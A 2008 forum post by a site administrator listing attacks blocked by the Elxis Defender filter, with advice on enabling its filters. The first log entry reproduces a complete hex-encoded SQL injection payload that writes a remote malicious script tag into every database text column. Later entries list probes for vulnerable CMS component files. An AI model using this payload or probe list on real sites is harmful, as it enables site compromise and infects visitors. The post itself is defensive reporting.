New session of attacks have started.

New attacks from several ip have started.

There have recently been several attempts to hack websites that I manage.
Thanks to Elxis Defender and some custom work I did all the websites were found to be SAFE after the attempts.

Here is a list of the attempts:
Elxis Defender blocked an attack to your site

ATTACKER IP ADDRESS: 118.167.16.97
Requested URI:

Code:

/?\';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);

DATE: 27-08-2008 09:14:38

ATTACKER IP ADDRESS: 118.167.16.97
Requested URI:

Code:

DATE: 27-08-2008 09:14:38

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:

Code:

/administrator/components/com_chronocontact/excelwriter/PPS/File.php

DATE: 31-08-2008 07:20:52

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:

Code:

/components/com_mosmedia/media.divs.php

DATE: 31-08-2008 06:49:46

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:

Code:

/administrator/components/com_wmtportfolio/admin.wmtportfolio.php

DATE: 31-08-2008 03:34:14

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:

Code:

/components/com_sitemap/sitemap.xml.php

DATE: 31-08-2008 02:03:43

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:

Code:

/administrator/components/com_jcs/view/history.php

DATE: 30-08-2008 23:43:20

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:

Code:

/components/com_smf/smf.php

DATE: 30-08-2008 23:25:28

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:

Code:

/administrator/components/com_mosmedia/includes/purchase.html.php

DATE: 30-08-2008 23:19:39

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:

Code:

/components/com_mp3_allopass/allopass-error.php

DATE: 30-08-2008 22:42:33

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:

Code:

/components/com_thopper/inc/responses_type.php

DATE: 30-08-2008 22:23:49

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:

Code:

/components/com_slideshow/admin.slideshow1.php

DATE: 30-08-2008 20:41:53

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:

Code:

/administrator/components/com_jcs/view/register.php

DATE: 30-08-2008 20:09:05

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:

Code:

/administrator/components/com_peoplebook/param.peoplebook.php

DATE: 30-08-2008 20:03:38

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:

Code:

/components/com_moodle/moodle.php

DATE: 30-08-2008 19:35:51

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:

Code:

/administrator/components/com_mosmedia/includes/credits.html.php

DATE: 30-08-2008 19:26:40

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:

Code:

/modules/MambWeather/Savant2/Savant2_Plugin_options.php

DATE: 30-08-2008 18:57:43

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:

Code:

/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php

DATE: 30-08-2008 18:41:11

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:

Code:

/administrator/components/com_jcs/jcs.function.php

DATE: 30-08-2008 17:51:06

ATTACKER IP ADDRESS: 217.112.94.226
Requested URI:

Code:

/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php

DATE: 30-08-2008 16:21:40

Conclusion:
All the users MUST enable the Elxis Defender with ALL the filters ON, (you can find the basic list of the filters for the Elxis Defender inside the Elxis Defender options).
Go to Tools -> Elxis Defender -> and fill in ALL Example Filters

These options can protect you from almost all attempts to attack your website.
Some people will say : "Yes, ok I will enable all this but my website will be slower"

My answer to this question is simple: "You have the option to move your website to a better hosting provider and you will be sure that you are secure and you will not lose your data from your website".

Also if you see the targets of the attempts to attack the targets are for other CMS, and once again I would like to say again DO NOT use not verified modules, mambots, components from the Elxis Team use ONLY these from the Elxis Download Center.

*Modification to add more